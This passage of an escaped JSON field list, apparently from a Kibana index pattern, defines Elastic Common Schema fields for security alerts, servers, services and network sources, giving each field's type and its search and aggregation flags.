":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"rule.category\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"rule.description\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"rule.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"rule.license\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"rule.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"rule.reference\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"rule.ruleset\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"rule.uuid\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"rule.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.address\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.as.number\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.as.organization.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.as.organization.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"server.as.organization.name\"}}},{\"count\":0,\"name\":\"server.bytes\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.geo.city_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.geo.continent_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.geo.country_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.geo.country_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.geo.location\",\"type\":\"geo_point\",\"esTypes\":[\"geo_point\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.geo.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.geo.region_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.geo.region_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.ip\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.mac\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.nat.ip\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.nat.port\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.packets\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.port\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.registered_domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.top_level_domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.user.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.user.email\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.user.full_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.user.full_name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"server.user.full_name\"}}},{\"count\":0,\"name\":\"server.user.group.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.user.group.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.user.group.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.user.hash\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.user.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.user.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.user.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"server.user.name\"}}},{\"count\":0,\"name\":\"service.ephemeral_id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"service.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"service.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"service.node.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"service.state\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"service.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"service.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.ancestors.depth\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.ancestors.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.ancestors.index\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.ancestors.rule\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.ancestors.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.depth\",\"type\":\"number\",\"esTypes\":[\"integer\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.group.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.group.index\",\"type\":\"number\",\"esTypes\":[\"integer\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.action\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.category\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.created\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.dataset\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.duration\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.end\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.hash\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.kind\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.module\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.original\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"signal.original_event.outcome\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.provider\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.risk_score\",\"type\":\"number\",\"esTypes\":[\"float\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.risk_score_norm\",\"type\":\"number\",\"esTypes\":[\"float\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.sequence\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.severity\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.start\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.timezone\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_time\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.parent.depth\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.parent.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.parent.index\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.parent.rule\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.parent.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.parents.depth\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.parents.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.parents.index\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.parents.rule\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.parents.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.author\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.building_block_type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.created_at\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.created_by\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.description\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.enabled\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.false_positives\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.from\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.immutable\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.index\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.interval\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.language\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.license\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.max_signals\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.note\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"signal.rule.output_index\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.query\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.references\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.risk_score\",\"type\":\"number\",\"esTypes\":[\"float\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.risk_score_mapping.field\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.risk_score_mapping.operator\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.risk_score_mapping.value\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.rule_id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.rule_name_override\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.saved_id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.severity\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.severity_mapping.field\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.severity_mapping.operator\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.severity_mapping.severity\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.severity_mapping.value\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.size\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.tags\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.threat.framework\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.threat.tactic.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.threat.tactic.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.threat.tactic.reference\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.threat.technique.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.threat.technique.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.threat.technique.reference\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.threshold.field\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.threshold.value\",\"type\":\"number\",\"esTypes\":[\"float\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.timeline_id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.timeline_title\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.timestamp_override\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.to\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.updated_at\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.updated_by\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.status\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.threshold_count\",\"type\":\"number\",\"esTypes\":[\"float\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.address\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.as.number\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.as.organization.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.as.organization.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"source.as.organization.name\"}}},{\"count\":0,\"name\":\"source.bytes\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.geo.city_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.geo.continent_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.geo.country_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.geo.country_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.geo.location\",\"type\":\"geo_point\",\"esTypes\":[\"geo_point\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.geo.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.geo.region_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.geo.region_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.ip\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.mac\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.nat.ip\"